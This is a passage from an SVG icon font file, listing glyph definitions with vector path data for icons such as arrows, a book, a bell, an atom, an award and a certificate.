<glyph glyph-name="stylish-down" horiz-adv-x="1000" unicode="&#xeabe;" d="M267 614l-48-30c-11-7-11-17 0-24l262-165c11-7 27-7 38 0l178 112c10 7 19 2 19-10v-4c0-12-9-27-19-33-41-26-138-87-178-112-11-7-27-7-38 0l-177 112c-10 6-27 6-37 0-15-9-34-22-48-30-11-7-19-22-19-34v-111c0-12 7-26 16-32l265-167c11-6 27-6 38 0l262 166c11 6 11 17 0 23l-48 30c-10 7-27 7-37 0l-177-112c-11-6-27-6-38 0l-177 112c-10 7-19 22-19 34v3c0 13 8 17 18 11l178-113c11-6 27-6 38 0l178 113c10 6 27 17 37 23l47 30c11 6 19 21 19 34v110c0 12-8 27-19 34-14 9-33 21-47 30-11 7-27 7-38 0l-177-112c-11-6-27-6-38 0l-177 112c-10 7-27 7-37 0z" />
<glyph glyph-name="stylish-left" horiz-adv-x="1000" unicode="&#xeabf;" d="M764 584l-30 47c-7 11-17 11-24 0l-165-262c-7-11-7-27 0-38l112-178c7-10 2-18-10-18h-4c-12 0-27 8-33 18-26 41-87 138-112 178-7 11-7 27 0 38l112 177c6 10 6 27 0 37-9 15-21 34-30 48-7 11-22 19-34 19h-111c-12 0-26-7-32-16l-10-17-157-248c-6-11-6-27 0-38l166-262c6-10 17-10 23 0l30 48c7 10 7 27 0 37l-112 177c-6 11-6 27 0 38l112 177c7 11 22 19 34 19h4c12 1 16-8 10-18l-113-178c-6-11-6-27 0-38l113-178 23-37 30-47c6-11 21-19 34-19h110c12 0 27 8 34 19 9 14 21 33 30 48 6 10 6 27 0 37l-112 177c-6 11-6 27 0 38l112 177c7 11 7 27 0 38z" />
<glyph glyph-name="stylish-right" horiz-adv-x="1000" unicode="&#xeac0;" d="M236 584l30 47c7 11 17 11 24 0l165-262c7-11 7-27 0-38l-112-178c-7-10-2-18 10-18h4c12 0 27 8 33 18 26 41 87 138 112 178 7 11 7 27 0 38l-112 177c-6 11-6 27 0 38 9 14 22 33 31 47 6 11 21 19 33 19h111c12 0 26-7 32-16l11-17 156-248c7-11 7-27 0-38l-165-262c-7-10-17-10-24 0l-30 48c-7 10-7 27 0 37l112 178c6 10 6 27 0 37l-112 177c-7 11-22 19-34 19h-3c-13 1-17-8-11-18l113-178c6-11 6-27 0-38l-113-178-23-37-30-47c-6-11-21-19-33-19h-111c-12 0-27 8-34 19-9 14-21 33-30 48-6 10-6 27 0 37l112 177c7 11 7 27 0 38l-112 177c-6 11-6 27 0 38z" />
<glyph glyph-name="stylish-up" horiz-adv-x="1000" unicode="&#xeac1;" d="M267 86l-48 30c-11 7-11 17 0 24l262 165c11 7 27 7 38 0l178-112c10-7 19-2 19 10v4c0 12-9 27-19 33-41 26-138 87-178 112-11 7-27 7-38 0l-177-112c-10-6-27-6-37 0-15 9-34 22-48 31-11 6-19 21-19 33v111c0 12 7 26 16 32l265 167c11 7 27 7 38 0l262-165c11-7 11-17 0-24l-48-30c-10-7-27-7-37 0l-177 112c-11 6-27 6-38 0l-177-112c-10-7-19-22-19-34v-3c0-13 8-17 18-11l178 113c11 6 27 6 38 0l178-113c10-6 27-16 37-23l47-30c11-6 19-21 19-33v-111c0-12-8-27-19-34-14-9-33-21-47-30-11-6-27-6-38 0l-177 112c-11 7-27 7-38 0l-177-112c-10-6-27-6-37 0z" />
<glyph glyph-name="swoosh-down" horiz-adv-x="1000" unicode="&#xeac2;" d="M509 650l-17-2c-3-1-5-3-5-6v-124l-16-2v98c0 2-1 4-3 5-1 0-3 1-5 1l-20-3c-3-1-5-3-5-5v-351l-109 110c-9 8-23 9-32 2l-58-42c-9-6-10-18-2-26l248-249c8-8 22-8 30 0l248 249c8 8 7 20-2 26l-59 41c-9 7-24 5-32-3l-108-108v331c0 2-1 3-3 4-1 1-3 2-5 1l-16-2c-3 0-5-3-5-5v-94l-16-2v151c0 1-1 3-3 4-1 1-3 1-5 1z" />
<glyph glyph-name="swoosh-left" horiz-adv-x="1000" unicode="&#xeac3;" d="M800 341l-2 17c-1 3-3 5-6 5h-124l-2 16h98c2 0 4 1 5 3 0 1 1 3 1 5l-3 20c-1 3-3 5-5 5h-351l109 109c9 9 10 23 3 32l-42 58c-6 9-18 10-26 2l-249-248c-8-8-8-22 0-30l249-248c8-8 20-7 26 2l41 59c7 9 5 24-3 32l-108 108h331c2 0 3 1 4 3 1 1 2 3 1 5l-2 16c0 3-3 5-5 5h-94l-2 16h151c1 0 3 1 4 3 1 1 1 3 1 5z" />
<glyph glyph-name="swoosh-right" horiz-adv-x="1000" unicode="&#xeac4;" d="M200 341l3 17c0 3 2 5 5 5h124l2 16h-98c-2 0-3 1-5 3 0 1-1 3-1 5l3 20c1 3 3 5 5 5h351l-109 109c-9 9-10 23-3 32l42 58c6 9 18 10 26 2l249-248c8-8 8-22 0-30l-248-248c-9-8-20-7-27 2l-41 59c-7 9-5 24 3 32l108 108h-331c-2 0-3 1-4 3-1 1-2 3-1 5l2 16c0 3 3 5 5 5h94l2 16h-151c-1 0-3 1-4 3-1 1-1 3-1 5z" />
<glyph glyph-name="swoosh-up" horiz-adv-x="1000" unicode="&#xeac5;" d="M509 50l-17 3c-3 0-5 2-5 5v124l-17 2v-98c0-2 0-3-2-4-1-1-3-2-5-1l-20 2c-3 1-5 3-5 5v351l-110-109c-8-9-22-10-31-3l-58 42c-10 6-10 18-2 27l248 248c8 8 21 8 30 0l248-249c8-8 7-20-2-26l-59-41c-10-6-24-5-32 3l-108 108v-331c0-2-1-3-3-4-1-1-3-2-5-1l-16 2c-3 0-5 3-5 5v94l-17 2v-151c0-1 0-3-2-4-1-1-3-1-5-1z" />
<glyph glyph-name="thin-double-left" horiz-adv-x="1000" unicode="&#xeac6;" d="M533 634l-16 16-309-300 309-300 16 16-292 284 292 284z m258 0l-16 16-308-300 308-300 16 16-291 284 291 284z" />
<glyph glyph-name="thin-double-right" horiz-adv-x="1000" unicode="&#xeac7;" d="M467 634l16 16 308-300-308-300-16 16 292 284-292 284z m-259 0l16 16 309-300-309-300-16 16 292 284-292 284z" />
<glyph glyph-name="thin-down" horiz-adv-x="1000" unicode="&#xeac8;" d="M800 497l-300-309-300 309 17 16 283-292 284 291 16-15z" />
<glyph glyph-name="thin-left" horiz-adv-x="1000" unicode="&#xeac9;" d="M663 634l-292-284 291-284-16-16-308 300 308 300 17-16z" />
<glyph glyph-name="thin-right" horiz-adv-x="1000" unicode="&#xeaca;" d="M338 66l292 284-292 284 16 16 308-300-308-300-16 16z" />
<glyph glyph-name="thin-up" horiz-adv-x="1000" unicode="&#xeacb;" d="M784 188l-284 291-284-291-16 16 300 308 300-308-16-16z" />
<glyph glyph-name="abc" horiz-adv-x="1000" unicode="&#xeacc;" d="M999 346c0 23-13 35-36 38-76 8-152 16-227 25-24 3-31-5-32-29-2-35-24-54-61-54-21 0-42 0-63 0 20-11 40-15 61-17 70-7 140-14 211-23 54-6 63-18 63-72 0-82 0-165 0-248 32 31 79 53 82 97 6 94 2 188 2 283z m-857-60c47 4 94 8 141 15 46 7 95 5 140 21-6 3-11 4-16 3-56-7-100 6-117 67-6 20-22 17-37 15-67-7-133-17-199-21-40-3-52-21-52-59 2-68 7-136-1-204-8-73 34-114 86-166 0 96 1 181 0 265 0 38 15 60 55 64z m161 135c0 53 0 100 0 147 0 146-16 151 146 149 70-2 140-1 217-1-21 31-19 71-67 70-91-2-183-2-274-1-35 1-47-16-47-48 0-88 0-175 0-262 0-19 2-37 25-54z m336-79c35-1 50 16 50 51 0 86 0 172 0 258 0 32-16 49-48 49-92 0-184 0-275 0-31 0-47-14-48-45 0-89 0-178 0-267 1-32 17-47 50-46 45 1 89 0 133 0 46 0 92 1 138 0z m-257 12c-33 0-51 19-51 53 0 75 0 150 0 225 0 36 18 54 54 54 40 0 80 0 121 0 38 0 77 0 116 0 34 0 52-16 52-50 0-77 0-153 0-230 1-35-19-52-51-52-80-2-161-2-241 0z m40-54c-91-10-182-20-273-29-32-3-47-18-46-51 1-86 0-172 0-258 0-36 15-51 51-47 92 10 185 18 277 28 28 3 42 18 42 47-1 43 0 86 0 129 0 44-1 89 0 133 0 36-16 52-51 48z m38-287c1-38-17-57-53-61-79-8-157-17-236-24-35-4-56 15-56 51-1 76-1 152 0 228 0 29 12 49 43 52 81 9 162 18 243 25 44 4 57-11 59-55 1-36 0-72 0-108l0 0c0-36-1-72 0-109z m439 80c0 43-1 86 0 129 1 28-9 45-39 48-95 10-190 20-285 30-30 3-45-11-45-41 0-92 0-183 0-275 0-26 15-38 38-41 94-10 188-18 282-28 36-4 50 13 49 49-1 43 0 86 0 129z m-11-108c-2-45-24-61-68-56-70 8-140 15-210 21-55 5-69 19-69 73 0 66-1 133 0 199 0 50 17 66 66 62 78-7 157-16 235-24 33-4 45-25 46-55 1-37 0-74 0-112 0-36 1-72 0-108z m-230 425c0 73 0 147 0 220 1 28-12 41-39 40-39 0-78 0-117 0-37 0-75 0-112 0-29 1-43-10-43-41 1-72 1-144 0-216 0-31 13-44 42-44 76 0 152 0 229 0 27 0 40 13 40 41z m-49-20c-22 0-44-1-66 1-13 0-32-8-35 11-2 16-13 37 10 48 9 4 9 8 7 16-3 9-5 19-18 17-19-2-40 9-55-8-7-9-3-17 5-28 23-32 8-56-32-57-11 0-22 0-33 1-12 0-29-6-32 10-4 17-10 37 6 51 37 34 37 84 55 126 6 16-18 30-16 52 2 23 8 32 31 30 22-1 45 0 67 0 18 0 36 0 54 0 40 0 57-27 34-60-11-17-9-27-2-40 18-37 18-82 53-113 23-21 0-56-33-57z m-206-121c-79-9-157-17-236-25-28-2-37-18-36-45 0-34 0-69 0-104 0-37 0-75 0-112 0-31 15-42 45-39 76 8 151 16 227 23 27 3 41 15 41 43 1 73 1 147 0 220 0 27-12 42-41 39z m37-203c-7-37-33-62-69-71-67-18-137-23-205-30-8-1-19-4-20 8-3 17-8 35 5 52 19 26 20 117 2 141-22 29-11 61 24 65 57 8 115 14 173 19 32 3 62-3 75-38 13-34-7-55-34-77 29-18 55-36 49-69z m390 179c-75 7-151 15-227 23-33 4-46-10-46-42 0-71 1-142 0-212 0-29 13-44 42-47 75-7 151-15 227-23 30-3 45 9 46 39 0 36 0 72 0 108 0 35-1 70 0 105 1 30-9 46-42 49z m12-229c-3-9-11-16-18-23-41-36-135-35-192 1-51 33-77 98-61 156 21 71 89 105 166 81 21-7 38-12 61-7 43 9 49 0 50-53-4-12 9-37-9-41-22-5-50-8-68 17-14 19-31 33-56 23-24-9-27-31-26-52 0-18 1-36 5-54 4-20 19-33 41-35 20-2 35 8 42 27 19 46 44 7 63 2 32-8 8-28 2-42z m-377 504c16-2 36-10 39 4 4 18-3 39-19 56-7-20-13-38-20-60z m-166-429c-20 0-37-4-34-22 2-20-1-36 19-32 20 5 45 4 45 33 0 18-14 22-30 21z m-14 47c17 4 38 3 38 31-1 19-16 16-30 16-16 0-30-2-27-24 1-13-1-27 19-23z" />
<glyph glyph-name="atom" horiz-adv-x="1000" unicode="&#xeacd;" d="M955-61c7 7 12 15 18 23 3 7 7 13 10 20 2 4 4 9 5 14 2 4 3 9 5 13 4 16 7 32 7 49 0 102-83 185-185 185-42 0-80-14-111-38l-79 96c8 19 13 39 13 61 0 48-23 90-58 117 0 3 1 6 2 9 11 31 22 62 30 94 2 7 5 12 8 15 10-2 21-4 31-4 65 0 118 52 118 117s-53 117-118 117-117-52-117-117c0-43 23-80 57-100 0-4-1-8-4-13-16-29-31-58-45-88-1-3-2-5-4-7-15 6-31 9-49 9-82 0-149-67-149-149 0-12 2-23 5-34l-92-52c-23 42-67 71-118 71-75 0-135-60-135-134 0-74 60-134 135-134s134 60 134 134c0 8-1 15-2 22 1 1 2 1 3 2l102 34c17-22 39-38 65-48 41-18 88-14 132 13l0 0 92-76c-19-29-31-64-31-102 0-102 83-185 185-185 55 0 103 25 137 62 1 1 2 3 3 4z" />
<glyph glyph-name="award" horiz-adv-x="1000" unicode="&#xeace;" d="M910 785c-7 38-36 55-78 50-15-2-20 0-17 15h-631c2-12 2-18-15-16-49 7-78-16-83-67-7-62 2-123 29-179 30-64 68-79 141-57 18 5 25 1 34-14 28-45 65-83 115-106 9-4 9-8 5-16-21-45-29-94-36-142-1-11 2-13 12-13 73 0 147 1 221 0 15 0 13 9 12 18-6 45-14 89-33 131-5 11-5 16 7 22 52 23 89 62 119 110 7 12 13 17 28 11 14-6 29-7 43-10 36-6 64 7 83 36 46 69 59 146 44 227z m-657-225c-15-2-29-6-45-9-25-4-42 9-55 28-24 33-33 71-39 110-2 15-3 30-4 38 0 23 2 40 8 55 9 24 52 34 71 16 3-3 3-7 3-11 14-74 33-146 67-214 3-7 3-11-6-13z m129-35c-11-9-18 0-25 9-47 70-76 148-97 228-1 2-1 4-1 6 1 8 3 14 12 16 9 1 15-2 18-12 6-23 13-46 21-68 18-54 40-105 73-152 7-9 10-19-1-27z m507 207c-2-46-8-92-30-133-31-59-57-54-115-38-9 3-5 7-3 11 33 69 53 142 67 217 0 4 0 7 4 10 25 20 67 5 73-26 3-14 6-27 4-41z m-198-548c-1 25-16 39-41 40-16 0-31 0-46 0-85 0-170 0-254 0-28 0-44-14-44-39-1-33 0-66 0-99h-99v-236h585v236h-102c0 33 1 65 1 98z" />
<glyph glyph-name="bell-alt" horiz-adv-x="1000" unicode="&#xeacf;" d="M689 776c21 0 54-6 86-18 6-3 7-1 7 5 2 27 12 50 34 66 29 23 61 27 94 12 35-17 53-46 51-85-1-48-36-82-87-86-7-1-8-2-5-8 27-73 23-145 1-218-23-72-61-136-114-189-51-51-75-113-90-181-7-31-13-61-24-91-13-34-39-50-74-53-42-4-82 6-120 21-62 25-116 63-166 106-66 57-125 119-173 191-29 45-54 92-65 144-6 25-8 49-4 74 5 38 27 60 63 70 35 11 71 16 107 24 29 6 57 13 84 24 27 12 49 29 70 49 37 37 79 68 126 93 58 31 120 50 199 50z m52-91c-20 7-39 9-58 10-52 1-96-19-136-51-41-33-77-71-116-106-42-39-87-73-139-97-41-19-84-33-130-32-9 0-11-2-10-11 6-33 25-57 51-77 9-6 19-9 30-7 12 3 24 5 36 9 61 20 109 58 149 107 49 60 99 119 157 170 48 41 98 79 166 85z m131 119c-25 0-45-19-45-44-1-25 20-46 45-46 24 0 44 21 45 45 0 25-20 45-45 45z m-636-864c0 27 11 50 31 69 5 4 8 3 12 0 40-32 82-61 129-83 5-2 5-5 4-10-13-53-78-82-126-56-32 16-49 43-50 80z" />
<glyph glyph-name="black-board" horiz-adv-x="1000" unicode="&#xead0;" d="M153 788c-20 0-26-7-26-28v-492c0-22 6-28 27-28h693c20 0 26 7 26 27v493c0 21-6 27-26 27-231 1-463 1-694 1z m762-584c-4 1-8 1-12 1h-806c-3 0-7 0-11 0-9-2-15-9-15-19 0-9 5-17 14-19 5-1 10-1 14-1 125 0 250 0 375 0-19-27-39-53-58-80-34-47-69-94-103-142-8-11-6-22 5-29 10-5 22-3 30 8 5 6 10 12 14 19 46 62 91 125 138 189 3-5 6-8 8-12 48-64 95-129 142-194 9-12 21-16 32-10 11 7 13 19 4 31-54 74-107 147-160 220 125 0 250 0 375 0 5 0 10 0 15 2 9 2 13 9 13 18 0 10-5 16-14 18z" />
<glyph glyph-name="book-alt" horiz-adv-x="1000" unicode="&#xead1;" d="M782 849v-146h121v-852c-8 0-15-1-23-1-196 0-393 0-589 0-104 0-192 83-193 186-2 222-2 445 0 668 0 87 62 144 153 145 120 2 240 1 360 1 49 0 97 0 146 0 7 0 15-1 25-1z m78-944v747h-78v-538h-27c-155 0-310 1-465-1-28-1-58-9-85-20-40-19-57-60-50-109 5-39 33-66 77-74 14-3 28-5 42-5 151 0 302 0 454 0h132z m-380 639c-47 0-94 0-141 0-15 0-28-3-28-20 0-18 13-22 28-21 94 0 188 0 281 0 16 0 31 3 30 22 0 17-15 19-29 19-47 0-94 0-141 0z m0 67c47 0 94 1 141 0 15 0 29 2 29 20 1 19-14 22-30 22-93 0-186 0-279 0-15 0-30-3-30-22 0-19 16-20 31-20 46 1 92 0 138 0z m0-176c-47 0-95 0-143 0-14 0-26-3-26-20 0-17 12-20 27-20 95 0 191 0 286 0 14 0 27 4 26 20 0 17-12 20-27 20-47 0-95 0-143 0z m305-445h-502c-6 0-14-2-18 1-8 6-17 15-18 23-1 6 11 14 18 20 3 2 10 1 14 1 156 0 312 0 467 0 42 0 42 0 39-45z" />
<glyph glyph-name="book" horiz-adv-x="1000" unicode="&#xead2;" d="M391 140c39-13 77-27 105-59v13c0 150 0 300 0 450 0 15-5 25-16 33-2 2-4 3-6 4-30 22-65 34-100 44-72 21-147 32-222 39-16 1-33 1-50 2v-480c29-2 57-4 86-6 69-7 137-19 203-40z m113-47v-12c23 27 53 41 85 52 86 31 177 44 269 50 13 1 27 2 40 2v481c-7 0-13 0-19-1-38-3-77-6-115-11-59-8-117-20-173-40-28-11-56-23-78-43-6-6-9-12-9-21 0-152 0-304 0-457z m409 495v-417c-3-1-5-1-7-1-89-2-176-13-261-35-54-14-107-29-145-70-19 23-46 36-74 47-89 34-183 48-278 56-20 1-40 2-61 3v417h-24v-455c7 0 14-1 21-1 85-3 168-12 251-30 59-13 119-26 166-68 19 20 44 32 70 42 93 32 191 45 290 53 25 2 51 3 77 4v455h-25z" />
<glyph glyph-name="brainstorming" horiz-adv-x="1000" unicode="&#xead3;" d="M886 645c-34 70-87 121-156 154-104 50-213 65-324 38-135-34-215-125-250-257-10-35-13-70-14-106 0-5 1-11 3-16 6-17 6-34 0-52-10-28-22-55-34-82-11-27-25-52-33-80v-8c2-2 1-5 2-8 4-15 13-22 27-22 8-1 15-1 22-4 11-6 14-16 5-26-14-16-10-35 10-44l24-9c5-2 7-5 2-8-16-10-15-24-9-38 2-5 4-9 9-11 6-4 11-8 17-11 13-8 16-19 15-32-1-9-2-18-5-27-13-34 23-78 61-76 30 0 57 8 85 16 11 3 21 7 31 11 7 3 10 1 11-6 6-29 12-58 18-87 0-1 1-3 2-4h3c16 9 34 12 50 18 101 31 201 62 301 93 7 2 9 5 8 11-6 38-10 76-15 113-2 9 0 17 5 25 29 44 62 86 91 131 27 44 54 89 64 141 17 90 15 179-26 263z m-385-251c-12 10-23 19-34 29-2 2-4 2-7 1-6-2-12-4-18-6-3 0-4-2-5-5-3-15-7-30-10-45h-39c-4 15-8 30-11 45-1 4-2 5-5 5-6 2-12 4-18 6-3 1-4 1-7-1-11-10-22-19-33-29-1-1-4-1-5-1-10 7-20 14-30 21 7 14 13 28 20 42 1 4 1 6-1 9-4 4-8 9-11 14-2 2-3 3-6 3l-43-4c-4-1-6-1-7 3-4 11-7 21-11 32 2 1 3 2 5 3 12 7 24 14 37 21 2 2 3 3 3 6 0 6 0 13 0 19 0 3-1 4-3 6-13 6-25 14-38 21-1 1-2 2-4 3 3 11 7 22 12 33 0 1 2 2 4 2 14-1 28-2 42-4 4 0 8 0 10 5s6 9 10 13c2 2 2 4 1 7-7 14-13 28-20 43l30 20c1 1 3 0 5-1 11-9 22-19 33-28 2-2 4-3 7-1 6 2 12 3 18 5 3 1 4 2 5 5 3 15 7 30 11 46h39c3-16 7-31 10-46 1-3 2-4 5-5 6-2 12-3 18-5 3-2 4-2 7 0 11 10 22 20 33 29 2 2 3 3 6 1 9-6 19-13 29-20-5-11-9-20-14-31-2-4-4-9-6-13-1-2 0-4 1-6 4-5 8-10 12-15 1-3 3-3 6-3 14 1 28 2 42 4 4 1 6 0 8-4 3-10 7-21 10-31-10-6-19-11-28-17-5-3-10-5-14-8-1-1-3-3-3-4 0-7 1-14 0-21 0-2 1-3 3-5 13-7 25-14 38-21 1-1 2-2 5-3-4-11-8-22-12-33-1-1-3-3-4-2-14 1-28 2-42 3-5 1-8 1-11-4-2-5-6-9-10-13-1-2-2-4 0-7 6-14 13-28 19-43-10-7-20-14-30-21-1 0-4 0-4 1z m259-75c8-5 17-10 25-15 1 0 2-1 3-2-2-7-5-15-8-22 0-1-1-2-2-2-10 1-19 2-29 3-3 0-6 0-7-3s-5-6-7-10c-1-1-2-2-1-4 5-10 9-19 14-30-7-4-14-9-21-14 0 0-2 0-3 1-7 7-15 13-23 20-1 1-2 1-4 0-4-1-9-2-13-3-2-1-3-2-3-4-3-10-5-20-7-31h-27c-2 11-5 21-7 31 0 2-1 3-3 4-5 1-9 2-13 3-2 1-3 1-4 0-8-7-15-14-23-20-1-1-3-1-3-1l-21 14c5 10 9 20 13 29 1 3 1 4 0 6-3 3-5 7-8 10-1 2-2 2-4 2-10-1-20-2-29-3-3 0-4 0-5 3-2 7-5 14-7 21 1 1 2 2 3 2l25 15c2 1 3 2 2 4v13c1 2 0 2-2 3l-26 15c0 1-1 1-2 2 2 8 5 15 8 23 0 1 2 1 2 1 10-1 20-1 29-3 3 0 5 0 7 4 2 3 5 6 7 8 1 2 1 3 1 5-5 10-9 20-14 30 7 4 14 9 21 14 0 0 2 0 3-1 8-6 15-13 23-20 1-1 2-1 4 0 4 1 9 2 13 3 2 1 3 2 3 4 2 10 5 20 7 31h27c3-11 5-21 7-31 1-2 1-3 3-4 5-1 9-2 13-3 2-1 3-1 4 0 8 7 15 14 23 20 1 1 3 2 4 1 6-5 13-10 20-14-3-8-6-14-9-21l-5-9c0-2 0-3 1-4l8-11c1-2 2-2 4-2 10 1 20 2 29 3 3 0 4 0 5-3 3-7 5-14 8-21-7-4-14-8-20-12-3-1-7-3-9-5-2-1-2-2-2-3v-14c0-1 0-2 2-3z m88 232c0 0-1-1-3-1-9 1-19 2-28 3-3 0-5 0-7-3s-5-6-7-9c-1-2-2-3-1-5 5-9 9-19 14-30-7-4-14-9-21-14-1 0-2 0-3 1-8 7-15 13-23 20-1 1-2 1-4 0-4-1-9-2-13-3-2-1-3-2-3-4-2-10-5-20-7-31h-27l-7 31c0 3-1 3-4 4-4 1-8 2-12 4-2 0-3 0-4-1-8-7-16-13-23-20-1-1-3-1-3-1l-21 14c5 10 9 20 13 30 1 2 1 3-1 5-2 3-5 7-7 10-1 2-2 2-4 2-10-1-20-2-29-3-3 0-4 0-5 3-3 7-5 14-8 21 2 1 3 2 4 2 8 5 17 10 25 15 2 1 3 2 3 4-1 4-1 8 0 13 0 2-1 3-3 4-9 5-17 10-25 14-2 1-2 1-4 2l9 23c0 1 1 1 2 1 10 0 20-1 29-2 3-1 5 0 7 3s4 6 7 9c1 1 1 2 1 4-5 10-9 20-14 30 7 5 14 10 21 14 0 1 2 0 3-1 8-6 15-13 23-19 1-2 2-2 4-1 4 1 9 3 13 4 2 0 2 1 3 3 2 10 5 21 7 31h27c2-10 5-20 7-31 0-2 1-3 3-3 5-1 9-2 13-4 2-1 3-1 4 1 8 6 16 13 23 20 1 1 2 1 4 0 7-5 13-9 20-14-3-7-6-14-9-21-2-3-3-6-5-9 0-1 0-3 1-4 3-3 5-7 8-10 1-2 2-3 4-2 10 1 19 2 29 3 3 0 4 0 5-3 2-7 5-14 7-22-6-4-13-7-19-11-4-2-6-3-10-6 0 0-1-1-1-2v-14c0-2 0-3 2-4l25-14c1-1 2-1 4-3-3-7-6-15-9-23z m-441 98c-53 0-97-43-96-97 0-53 43-97 97-97 53 1 96 44 96 98 0 53-43 96-97 96z m256-243c-36 0-65-29-65-65 0-37 29-65 65-65 36 0 65 29 65 65 0 36-29 65-65 65z m63 260c-37 0-66-29-65-65 0-36 29-65 65-65 36 0 65 29 65 65 0 37-28 65-65 65z" />
<glyph glyph-name="certificate-alt-1" horiz-adv-x="1000" unicode="&#xead4;" d="M630 286h-130v0h-131c-9 0-14-4-15-12-2-12 4-18 17-18h176l83 0c7 0 13 1 15 8 5 13-2 22-15 22z m212 66c15 0 25 7 29 19 2 6 1 13 1 19 0 20-10 31-30 31h-341s-228 0-342 0c-7 0-14-2-21-6-10-8-9-19-10-31-1-22 14-32 32-32 68 0 137 0 206 0h345c43 0 87 0 131 0z m-289-150c26 0 52 0 79 0 10 0 14 5 14 15 0 11-4 15-16 15-23 1-46 1-69 1-63 0-127 0-190-1-12 0-17-4-17-15 0-10 5-15 16-15 43 0 87 0 130 0 17 0 35 0 53 0z m-304 268c84 1 168 0 251 0v1h252c22 0 32 10 32 31v7c0 19-11 30-31 30-169 0-338 0-508 0-13 0-23-7-27-18-2-6-1-12-1-18-3-23 14-33 32-33z m751 245c0 15 2 14-14 14-137 0-274 0-411 0-188 0-375 0-563 0-10 0-12-3-12-13 0-58 0-117 0-176v-503c0-6 0-11 9-11 65 1 130 0 195 0 141 0 283 0 424 0 21 0 20 0 21 21 0 10-3 11-12 11-96 0-192 0-288 0-102 0-204 0-306 0-9 0-11 2-11 11 0 47 0 95 0 142 0 159 0 318 0 477 0 8 2 9 10 9 153 0 305 0 458 0v0h47c137 0 274 0 411 0 8 0 10-2 10-10 0-71 0-142 0-213 0-135 0-271 0-406 0-8-2-10-10-10-36 0-72 0-108 0-22 0-22 0-22-22-1-8 2-10 10-10 50 0 101 1 152 0 8 0 10 3 10 11 0 226 0 452 0 678z m-159-642l102 0c8 0 10 2 10 10 0 58 0 115 0 173v410c0 17 0 16-17 16-63 0-125 0-187 0h-435c-85 0-171 0-256 0-9 0-11-2-11-11 0-109 0-219 0-328 0-86 1-173 0-259 0-9 3-11 12-11 19 1 39 0 58 0 174 0 349 0 523 0 5 0 9 0 9 7-1 6 0 10-8 10-18-1-35 0-52 0h-288c-75 0-150 0-226-1-10 0-12 3-12 13 1 35 0 69 0 104 0 150 0 301 0 451 0 8 3 9 10 9 33 0 67 0 100 0l385 0c122 0 245 0 368 0 9 0 11-1 11-10 0-59 0-118 0-176 0-127 0-254 0-381 0-7-2-10-9-10-29 1-58 1-87 0-6 0-14 4-14-8 1-12 9-8 14-8z m-106-66c-16 1-30 6-43 16-2 1-3 1-4-2-4-12-8-24-13-36l-7-23c1 0 2 0 3 0 8 2 16 3 24 4 2 1 3 0 4-1 6-6 12-11 18-17 0 0 0 0 0 0 6 19 13 37 19 56 1 2 0 3-1 3z m54 15c0 1-1 3-3 1-13-10-27-15-43-16-2 0-2-1-2-3 7-18 13-36 20-54 0-2 1-2 2-1 4 4 8 7 11 11 4 6 9 8 16 6 7-2 13-3 20-4-2 7-5 14-7 21-4 12-9 26-14 39z m-95 121c-2 0-4-1-5-3-1-2-2-4-2-6-1-2 0-2 1-3 3 0 6-2 9-4 2-1 4-4 6-3 2 0 4 3 6 4l0 1c1 0 1 1 0 2-3 4-7 7-11 10-1 1-2 2-4 2z m-9-91c1-1 2-1 2 0 3 5 7 8 11 12 1 1 1 1 1 2l-3 6c-1 0-1 1-2 1 0 0 0 0 0 0-5-3-11-5-15-10-2-2-1-4 0-6 2-3 4-4 6-5z m14 93c0-1 0-1 0-1 5-3 9-7 12-11 1-1 1-2 3-1 1 1 3 2 5 3 1 1 2 1 1 2-2 5-4 9-8 13-1 2-3 3-5 3l0 0c-3-1-8-6-8-8z m47 7c-1 10-6 11-14 7l-1-1c-1 0-1-1 0-2 3-4 4-9 5-15 0-1 0-2 1-1 2 0 4-1 7-1 1 0 1 1 2 2 0 2 0 5 0 7h0c0 1 0 3 0 4z m-74-46l0-3c1-2 1-3 3-2 3 0 6 0 9 0 2 0 4 0 7 0 1 0 1 0 1 1 1 2 2 4 2 6 1 2 0 2-1 2-4 2-9 3-13 4-6 1-9-2-8-8z m7 11c4 0 7-1 10-2 3-1 5-3 7-2 2 1 3 4 4 6 1 1 1 2 0 3-3 2-6 4-10 5-8 5-12 2-12-8 0-1-1-2 1-2z m-2-50c1-1 1 0 2 0 3 3 7 5 10 7 4 2 4 2 4 7-1 1-1 2-1 3 0 1-1 1-1 1-6-1-12-2-17-5-1-1-2-2-2-5 0-3 3-6 5-8z m-5 17c1-1 1-1 3 0 3 2 7 3 12 3 4 1 4 1 4 7 0 0 0 1 0 2s0 2-1 2c-4 0-8 1-11 0-10-1-12-6-7-14z m51 75c-4 0-6-2-8-5-1-1-1-1 0-2 3-3 4-6 6-10 1-1 1-4 3-4 1-1 3 0 5 0 4 1 4 1 3 5-1 4-2 8-4 12-1 2-2 4-5 4z m-9-126c0 4 1 9 3 13 1 2 1 3-2 4-1 1-2 2-3 3-2 1-2 0-3-1-2-3-4-6-6-10-4-8-1-12 8-12 2-1 3 0 3 3z m57-3c3 1 8 6 9 8 0 1-1 1-1 1-5 3-9 8-12 12-1 1-1 1-2 0l-6-3c-1 0-2 0-1-2 3-5 5-10 9-14 1-1 2-2 4-2 0 0 0 0 0 0z m28 36c-5 0-11 2-16 4-1 1-1 0-2-1-1-1-2-3-3-5-1-1-1-2 0-2 3-2 7-5 10-6 9-4 12-2 13 8 0 1 0 2-2 2z m9 29c-1 2-2 3-2 4-1 2-1 1-2 1-4-2-7-3-11-4-2 0-4 0-5-1-2-2-1-4-1-6-1-4-1-4 3-4 2 0 3 0 5 0 2 0 4 0 6 0 7 1 9 4 7 10z m-61-68c-2 4-3 8-4 12-1 5-1 5-5 5l-4 0c0 0-1 0-1-1 0-6-1-12 1-18 1-2 3-3 5-3 3 0 5 1 8 3 1 1 1 1 0 2z m59 48c1 2 0 5-1 7 0 1 0 1-1 1-6-2-11-1-16-1-1 0-2 0-2-1-1-2-1-4-2-6 0-1 0-2 1-2 4-2 9-3 13-4 6 0 8 2 8 6z m-56-46c1-3 2-5 6-5 3 1 5 3 7 5 1 1 2 1 0 2-2 3-4 6-6 10-1 1-1 4-3 5-1 0-4-1-6-1-2 0-3-2-2-4 1-4 2-8 4-12z m39 15c1 2 2 3 3 5 0 2 0 2-1 3-5 1-8 3-12 6-3 2-3 2-6-1-1-1-2-1-3-2-1-1-1-2 0-3 2-2 4-5 7-7 2-2 4-4 7-4 3 0 4 1 5 3z m-1 54c5 1 11 2 16 5 1 1 3 3 3 5-1 4-3 6-6 9-1 0-1 0-2-1-3-3-6-5-10-7-4-2-4-2-3-7 0-1 